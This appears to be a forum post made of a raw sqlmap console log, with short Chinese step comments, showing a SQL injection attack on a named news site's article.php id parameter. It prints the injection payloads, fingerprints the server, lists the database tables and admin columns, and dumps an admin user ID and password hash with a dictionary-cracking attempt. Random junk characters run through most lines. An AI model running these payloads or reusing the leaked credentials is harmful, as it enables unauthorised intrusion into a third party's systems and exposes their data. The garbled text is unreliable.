D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db4 e( M( D3 O1 K5 U8 t" A
ms "Mysql" --current-user /* 注解:获取当前用户名称
; H/ u7 \9 _7 N sqlmap/0.9 - automatic SQL injection and database takeover tool
) o: v3 O* M/ ?/ Q) e http://sqlmap.sourceforge.net starting at: 16:53:54- h8 }$ y1 ]4 w6 I5 `2 j0 u4 Z) L
[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as" J. _( _3 A8 K
session file
, A& \4 i" M7 h% W9 ^1 H I[16:53:54] [INFO] resuming injection data from session file
6 l! V# k/ A1 N$ [: }[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
m! {% m+ |5 k2 r* I[16:53:54] [INFO] testing connection to the target url
' ^/ ^2 L! Y& d1 \: w' G' Vsqlmap identified the following injection points with a total of 0 HTTP(s) reque
3 q9 s( U$ v" Q+ p0 ysts:& v/ t7 w- L0 G# `, {
---2 `7 k) Y5 y9 J4 r7 t ]& L# i! K) L
Place: GET
; N6 x) L4 t5 bParameter: id
+ W" G1 X" g* E6 B. B3 b2 c Type: boolean-based blind. g0 p D# p7 A$ u8 E
Title: AND boolean-based blind - WHERE or HAVING clause
$ F" n& r& E8 T* i Payload: id=276 AND 799=799
; E# t7 X* i+ U" i' `1 W Type: error-based7 M, W K* z8 j: ^
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause8 I' a; r7 R, W7 ?! q7 S2 d' h
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
- [6 `* E7 {1 `* Q6 w. e* Q120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
; ~2 @& @8 j3 K% X( ]3 R: i),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
& v2 V) t& e6 R+ ?) d, ] Type: UNION query* M& D n0 Q1 I! N
Title: MySQL UNION query (NULL) - 1 to 10 columns
, P2 S( b' m9 D Y* c7 ]$ `3 ] Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
: }, D! v& V+ J4 o0 Z+ U4 @: N(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),# m7 i2 V. y" A- s) p. M/ @2 P
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#2 }: [% e$ ^7 Y' k+ v x0 n
Type: AND/OR time-based blind6 u" Q$ }, ?3 u9 ~
Title: MySQL > 5.0.11 AND time-based blind0 ^, X$ m4 k0 F$ r/ k5 J
Payload: id=276 AND SLEEP(5)/ e) o, g. V1 h7 O; K. W+ H2 b9 J( ?
---
6 L. r: g, \/ e u* E# b[16:53:55] [INFO] the back-end DBMS is MySQL
+ O* t8 H: U" W0 |0 ?) Fweb server operating system: Windows
4 i; q/ i- z( u! aweb application technology: Apache 2.2.11, PHP 5.3.09 H" j1 r6 \2 t6 k7 y9 t! {
back-end DBMS: MySQL 5.0
7 E* q8 s* g# T3 n/ i' d) Z[16:53:55] [INFO] fetching current user
( p- I( K! f2 c& v1 Fcurrent user: 'root@localhost' ) D. B+ c) P8 w& D9 K7 r1 Y! {9 W
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
3 x2 G b+ v3 O2 W* l8 w; [( Rtput\www.wepost.com.hk' shutting down at: 16:53:583 l; U6 l, ?) D- | |
$ ^- K; ~4 m3 \8 ^D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
0 ]& e8 V. h& y; x. b* Kms "Mysql" --current-db /*当前数据库
5 F* W' ]: v( C) B, Z% x sqlmap/0.9 - automatic SQL injection and database takeover tool
& v0 N2 W6 r8 E% `) O5 b http://sqlmap.sourceforge.net starting at: 16:54:16
7 O, [' P- ~" q% S( G2 b3 l- l) ^[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as' J. H% g* U3 E3 r" \2 n6 Q
session file
8 c( O7 c% {* x3 T8 B1 A8 C( ?4 p/ f[16:54:16] [INFO] resuming injection data from session file
9 I O7 d2 L9 Z- ]7 R- |# N[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file# R6 Y" m: Q1 a8 y7 q
[16:54:16] [INFO] testing connection to the target url. E1 j# O2 N) U/ p+ f2 R& h3 h
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
. T F. h( r4 }8 X1 ^6 Zsts:
4 m& I! t: }6 r- t' i* {+ H---6 }1 v9 y9 Z& r0 K
Place: GET
. w% P7 w/ V* Y- `: K; Q vParameter: id+ H7 q7 @+ ~5 ?/ n7 U, l
Type: boolean-based blind
3 @) ^* {; ^" t) r$ g Title: AND boolean-based blind - WHERE or HAVING clause
- t' `% i, Q/ i4 G8 D Payload: id=276 AND 799=799# ~' S+ L0 }# j6 N3 |1 }/ c
Type: error-based R/ A; Z4 }# b6 `2 ~; q5 F
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
+ I) c3 S2 i4 k. P T Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
5 E4 u; b! i% d4 [' F5 o# g120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,585 v! |4 l, ^& \; x, D
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
) v& n5 A; M! K* a4 H Type: UNION query
4 D6 {( T* e3 k" \9 Q! K Title: MySQL UNION query (NULL) - 1 to 10 columns" U" b6 K+ B9 I9 [& `, t& M. K, _
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
7 }. G8 A+ a' ^" w(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
; h( [5 C5 I% ^- N1 x0 E$ o- fCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#; [+ p: C( G3 \$ O' l- Y
Type: AND/OR time-based blind* c) i! C: u2 D
Title: MySQL > 5.0.11 AND time-based blind4 N, b& p$ x0 P( t+ U5 n+ a5 r& x
Payload: id=276 AND SLEEP(5)
( v( }3 i0 p9 I" i# I0 X( p---8 q) s; |$ _- D6 t2 j7 B3 a
[16:54:17] [INFO] the back-end DBMS is MySQL- _3 }, H' e6 T2 `
web server operating system: Windows! ~. ?3 X3 a; w, e# @( Z. M
web application technology: Apache 2.2.11, PHP 5.3.0
4 ^1 @, C# ~ K/ Z ?$ hback-end DBMS: MySQL 5.0( m/ ^, ~5 F# G& B0 q
[16:54:17] [INFO] fetching current database
& p1 `- \. j0 B, {+ Icurrent database: 'wepost'+ O" ~7 C% B# U( A2 R2 @
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
6 _$ N) I: ^# _: k+ qtput\www.wepost.com.hk' shutting down at: 16:54:18
! g1 H+ |; {) HD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
% ]; q+ W6 p X: F8 S s' wms "Mysql" --tables -D "wepost" /*获取当前数据库的表名
0 S$ j2 u2 J7 e; r5 `: @' O4 G9 | sqlmap/0.9 - automatic SQL injection and database takeover tool% g; @% D0 @, n, Q6 T( P4 I, T! a
http://sqlmap.sourceforge.net starting at: 16:55:257 h( o9 j8 Z4 J4 r- A* j
[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as8 x6 y \# Z4 e! j+ a
session file
. t+ H4 Y: b6 C8 e/ u[16:55:25] [INFO] resuming injection data from session file) c0 }5 L$ z( x+ q; I
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file/ \' J9 N/ F0 h4 Z
[16:55:25] [INFO] testing connection to the target url
- y& W1 Z2 v3 Jsqlmap identified the following injection points with a total of 0 HTTP(s) reque
V6 t0 Q0 n. z( x- m! tsts:% i/ `0 r% y3 N+ g. Q
---* n6 q$ U) v* s# x7 N- W+ E: t
Place: GET
! h, G: R6 s! D# h! r5 D! _! aParameter: id' r, P+ y& n' W! `
Type: boolean-based blind* u8 E7 n! d& m6 S# I. p
Title: AND boolean-based blind - WHERE or HAVING clause5 \+ i7 D$ ]6 \/ Y8 e, j T+ G/ z
Payload: id=276 AND 799=799
1 A. m- A% `" n Type: error-based
* I" X# H4 ^7 ~' J# \8 ` Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
( @; B1 S9 B" `# s; b. h) E Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
/ C7 p7 z- N( B- R120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,582 \8 M8 O8 G3 t6 m; k+ v
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)5 d }* s& Q5 F, \& O' A5 F% Q
Type: UNION query
$ t; f3 p5 [5 X1 z7 ~ Title: MySQL UNION query (NULL) - 1 to 10 columns1 U: U9 c) f4 F. T' S; M' R
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR* n' X6 I# X$ D
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
. t5 X; c+ m' l1 N4 ACHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
+ I: }& f) i+ t" ` Type: AND/OR time-based blind
7 A1 y3 F4 t) ~ Title: MySQL > 5.0.11 AND time-based blind
- h% x2 Q7 x% X( Q. E Payload: id=276 AND SLEEP(5)) \# ]; ^5 w8 X) I4 V
---& E! d* A7 f" \/ S8 c9 L4 ~ M
[16:55:26] [INFO] the back-end DBMS is MySQL" j# ~- ~! a1 ~8 _3 }; p4 k% l
web server operating system: Windows
& ] ^5 Z6 B, J, Oweb application technology: Apache 2.2.11, PHP 5.3.0
& U" o2 u) G5 ?. O# Dback-end DBMS: MySQL 5.0
, A5 f! W% B3 \+ }6 Y[16:55:26] [INFO] fetching tables for database 'wepost'
& c3 B1 Q3 m, f[16:55:27] [INFO] the SQL query used returns 6 entries1 ?% b( f! p, T5 c# P- P3 d
Database: wepost
0 i! q" I4 {% a- D3 ?[6 tables]
0 f+ Q1 r, e w" f' k. N+-------------+
f+ b6 i# J1 s1 h) d$ K2 ~ Q" G| admin |. @* y' h( l; ~) C% L
| article |2 ?& o5 A) M5 W% l
| contributor |
. z$ O2 s+ Y7 w| idea |
" @5 n5 X' y4 y| image |
- N4 E8 n% z" t. j6 E| issue |
) ?1 H, t/ u& Y& {" I4 |+-------------+- g2 I! J' {* C4 F' J# I- R& N6 e
[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou9 H5 v l) Z o- R" y
tput\www.wepost.com.hk' shutting down at: 16:55:33
# E4 P* X2 @, A! ^
. I6 f4 t! F7 ?2 L& j6 W" AD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
5 V6 T# e: C" `7 Ums "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名/ P j- `$ e$ [0 \
sqlmap/0.9 - automatic SQL injection and database takeover tool
# o; k8 u1 j/ V http://sqlmap.sourceforge.net starting at: 16:56:06. p5 f* e% k2 x- w- ?
sqlmap identified the following injection points with a total of 0 HTTP(s) reque) M) t" J$ C& o. s5 g3 H- ^ W
sts:
, }$ Z- Q/ g* c---$ x- }3 B# S: J6 G# B; u
Place: GET/ Z; _) `& F& L# x6 k3 D/ y4 F+ z
Parameter: id
4 @9 Y J; `: O9 A Type: boolean-based blind
( e2 o) ?. S% o8 V! l1 a+ U Title: AND boolean-based blind - WHERE or HAVING clause
" J. p. i4 G' U t! `# n" l# H2 w* @ Payload: id=276 AND 799=799
/ w! G, b! Z' k5 v' U Type: error-based7 U# ?' B! J, S1 e* X \
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause& B1 b c0 X9 L$ O8 c0 M
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
* c t- f: h& `! F3 b) R/ W120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
( R+ T$ ?& s3 r3 @5 a),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
W( C* V* D# l' {6 ~ Type: UNION query
, F3 \6 B+ L' p0 O3 N+ W Title: MySQL UNION query (NULL) - 1 to 10 columns! X( U$ U {. k( T! t8 N
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
7 l- }! b+ \9 e; ~1 B* P3 m8 b- s0 v(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),! X$ ?/ Q, T, G, @! ^8 ?$ F5 h
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
, K: ~# z* M) q2 f/ K) d# D8 S/ H9 V7 | Type: AND/OR time-based blind
' X: y+ y0 V; _1 A; Y4 ~' z* @5 ? Title: MySQL > 5.0.11 AND time-based blind
6 N- w1 G6 X( j Payload: id=276 AND SLEEP(5)
X) g6 J4 N9 g* ?" n+ c---
+ k T" y6 ?' H: v) ^8 s" Fweb server operating system: Windows; S+ f# c( f% y; M/ z- s1 M8 h
web application technology: Apache 2.2.11, PHP 5.3.0
2 `: ]5 u% Y! q. w7 ^# Uback-end DBMS: MySQL 5.0
) |. y w! y" o* J4 n[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se* Q; |6 b2 f% v
ssion': wepost, wepost: S$ @' y4 f7 w
Database: wepost
8 {) a8 _( p- K# _# z3 @" |) bTable: admin& C- Y' x; `2 \0 S5 `
[4 columns]
/ q5 f! C0 Z9 W( s3 q7 D6 B+----------+-------------+
- A& A; G: F/ h: X; p7 @| Column | Type |4 {& J$ X7 ?/ [9 h
+----------+-------------+
# _: h$ g7 \9 K| id | int(11) |3 L6 S, G# G" m# W% @8 ~
| password | varchar(32) |
7 d0 b; T: L6 x' `' [| type | varchar(10) |
: D! e0 F" U! @0 y| userid | varchar(20) |/ ^+ [( c4 }; k1 Z7 P" e
+----------+-------------+
) g- O# ?- ~9 } \1 E3 ~2 g% n shutting down at: 16:56:197 R( Z- h' b. w2 O9 p; B
: H# S( R, Y/ Y" i
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
0 x5 O% h( Y3 u6 Jms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容2 x1 H8 k% {+ L! T( Q: o
sqlmap/0.9 - automatic SQL injection and database takeover tool9 }5 ]4 X2 j# F2 Z
http://sqlmap.sourceforge.net starting at: 16:57:141 ]1 r P { l* s( Y
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
0 v/ z. y. }8 Z- G) }6 \9 Hsts:1 I6 [# `1 D' x2 P
---) o; W9 P- s/ ?4 [
Place: GET
* L' Q' j2 U' n# mParameter: id! I9 L+ A& i$ K7 I0 o
Type: boolean-based blind
5 L+ u& i6 E! z) z6 B" W Title: AND boolean-based blind - WHERE or HAVING clause
) P* s, v3 s& q3 C& T5 S Payload: id=276 AND 799=7997 E' U B9 y- H5 _7 ^, M2 f% P
Type: error-based5 z# v9 }& H- m- s) \ U2 ?& r
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause: p' q4 T) Y7 S4 W/ `4 X/ l
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,* {- h0 y4 S$ ]2 t0 J7 x
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58. I1 Q6 i# b( }- X
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
3 j$ W3 J+ Y3 [" o6 @, g$ m3 o( n Type: UNION query
1 S h2 D$ f5 S. g0 q) `1 e+ J Title: MySQL UNION query (NULL) - 1 to 10 columns
# a8 H' ?& Q2 G0 X/ w: C$ M" J; } Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
7 U6 ]* m' v( {- _(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
v+ G& O9 a3 a- _* }7 {+ P5 DCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#/ p7 J& F. O c ?; |
Type: AND/OR time-based blind
" L: j, V: _) Y5 A) Z5 w/ T6 n! t" o Title: MySQL > 5.0.11 AND time-based blind
" I+ T: U" o' f% v) X Payload: id=276 AND SLEEP(5)
4 n! g2 i9 |# `5 \4 `% X6 s% X! H---
% X3 V( o' S# _3 u3 m: y7 S$ pweb server operating system: Windows# h! m) V$ M1 D p! @
web application technology: Apache 2.2.11, PHP 5.3.0- H1 \9 m) E" [1 b: E1 r
back-end DBMS: MySQL 5.0
- `6 C2 y3 x! f% n8 Qrecognized possible password hash values. do you want to use dictionary attack o
7 @ H, p/ d; nn retrieved table items? [Y/n/q] y
# o$ @4 L+ R0 M( \$ U ?& Kwhat's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
; E I3 v2 u5 z5 G/ p: edo you want to use common password suffixes? (slow!) [y/N] y
8 w1 s- ]2 U; c, m1 |" T( vDatabase: wepost
; `: w# R$ d/ P. [8 bTable: admin% f$ ]2 S" r2 }+ X( h2 Z+ y
[1 entry]2 v ~$ U$ ?4 x- j9 m e) x! d- s
+----------------------------------+------------+6 B- Y$ Q8 b+ h" K4 R
| password | userid |8 T9 B9 \0 H* G* |7 v5 y& `
+----------------------------------+------------+
! h+ r: g1 ~8 ^| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
: ?% l* Y: P5 V8 t5 y1 n5 W( G' f; a, ]+----------------------------------+------------+
7 z) q8 y y* ] shutting down at: 16:58:147 ~% O- A8 `& [7 `6 }1 A
. ^, w1 I" M& [: }. a
D:\Python27\sqlmap> |
发表于 2013-4-4 22:18:49
收藏
支持
反对